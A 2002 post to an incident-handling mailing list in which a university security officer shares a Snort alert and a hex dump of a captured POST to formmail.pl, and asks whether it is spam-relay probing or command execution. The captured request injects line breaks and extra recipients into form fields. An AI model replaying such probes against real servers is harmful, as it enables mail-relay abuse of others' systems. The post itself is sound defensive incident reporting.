new type of formmail probes

From: Russell Fulton (r.fulton@auckland.ac.nz)
Date: 09/05/02


From: Russell Fulton <r.fulton@auckland.ac.nz>
To: incidents@securityfocus.com
Date: 05 Sep 2002 14:23:55 +1200

Hi All,
        Over the last week or so snort has been picking up many probes like
this:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] WEB-CGI formmail arbitrary command execution attempt [**]
09/05-01:24:57.641599 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x30F
62.49.117.114:2645 -> 130.216.35.105:80 TCP TTL:107 TOS:0x0 ID:20226 IpLen:20 DgmLen:769 DF
***AP*** Seq: 0x350A6D63 Ack: 0x5BFB5778 Win: 0x2238 TcpLen: 20
50 4F 53 54 20 2F 63 67 69 2D 62 69 6E 2F 66 6F POST /cgi-bin/fo
72 6D 6D 61 69 6C 2E 70 6C 20 48 54 54 50 2F 31 rmmail.pl HTTP/1
2E 30 0D 0A 56 69 61 3A 20 31 2E 30 20 53 45 52 .0..Via: 1.0 SER
56 45 52 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A VER..Connection:
20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E Keep-Alive..Con
74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 30 32 tent-Length: 402
0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F ..User-Agent: Mo
7A 69 6C 6C 61 2F 34 2E 30 36 20 28 57 69 6E 39 zilla/4.06 (Win9
35 3B 20 49 29 0D 0A 43 6F 6E 74 65 6E 74 2D 54 5; I)..Content-T
79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E ype: application
2F 78 2D 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 /x-www-form-urle
6E 63 6F 64 65 64 0D 0A 48 6F 73 74 3A 20 77 77 ncoded..Host: ww
77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac
2E 6E 7A 0D 0A 41 63 63 65 70 74 3A 20 69 6D 61 .nz..Accept: ima
67 65 2F 67 69 66 2C 20 69 6D 61 67 65 2F 78 2D ge/gif, image/x-
78 62 69 74 6D 61 70 2C 20 69 6D 61 67 65 2F 6A xbitmap, image/j
70 65 67 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E peg, application
2F 6D 73 77 6F 72 64 2C 20 2A 2F 2A 0D 0A 52 65 /msword, */*..Re
66 65 72 65 72 3A 20 68 74 74 70 3A 2F 2F 77 77 ferer: http://ww
77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac
2E 6E 7A 0D 0A 0D 0A 65 6D 61 69 6C 3D 64 61 61 .nz....email=daa
31 38 40 66 64 6A 31 30 2E 63 6F 6D 26 72 65 63 18@fdj10.com&rec
69 70 69 65 6E 74 3D 3C 69 69 6B 65 73 74 79 78 ipient=<iikestyx
40 61 6F 6C 2E 63 6F 6D 3E 77 77 77 2E 63 73 2E @aol.com>www.cs.
61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 26 73 auckland.ac.nz&s
75 62 6A 65 63 74 3D 77 77 77 2E 63 73 2E 61 75 ubject=www.cs.au
63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 25 32 46 63 ckland.ac.nz%2Fc
67 69 2D 62 69 6E 25 32 46 66 6F 72 6D 6D 61 69 gi-bin%2Fformmai
6C 2E 70 6C 25 32 30 25 32 30 25 32 30 25 32 30 l.pl%20%20%20%20
25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 %20%20%20%20%20%
32 30 25 32 30 25 32 30 25 32 30 25 32 30 6F 78 20%20%20%20%20ox
79 35 32 26 3D 25 30 44 25 30 41 25 30 44 25 30 y52&=%0D%0A%0D%0
41 74 69 6D 65 25 32 46 64 61 74 65 25 33 41 25 Atime%2Fdate%3A%
32 30 30 38 25 33 41 32 30 25 33 41 31 39 70 6D 2008%3A20%3A19pm
25 32 30 25 32 46 25 32 30 30 39 25 32 46 30 34 %20%2F%2009%2F04
25 32 46 32 30 30 32 25 30 44 25 30 41 3C 41 25 %2F2002%0D%0A<A%
32 30 48 52 45 46 25 33 44 25 32 32 77 77 77 2E 20HREF%3D%22www.
63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E cs.auckland.ac.n
7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 6F z%2Fcgi-bin%2Ffo
72 6D 6D 61 69 6C 2E 70 6C 25 32 32 3E 77 77 77 rmmail.pl%22>www
2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E .cs.auckland.ac.
6E 7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 nz%2Fcgi-bin%2Ff
6F 72 6D 6D 61 69 6C 2E 70 6C 3C 25 32 46 41 3E ormmail.pl<%2FA>
25 30 44 25 30 41 25 30 44 25 30 41 25 30 44 25 %0D%0A%0D%0A%0D%
30 41 25 30 44 25 30 41 25 30 44 25 30 41 25 30 0A%0D%0A%0D%0A%0
44 25 30 41 6F 78 79 35 32 D%0Aoxy52

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Am I right in assuming that this just more spammers looking for places
to launder mail or is it more sinister than that? I.e. do we believe
the 'arbitrary command execution attempt' bit?

Cheers, Russell.

-- 
Russell Fulton, Computer and Network Security Officer
The University of Auckland,  New Zealand

"It aint necessarily so" - Gershwin

---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com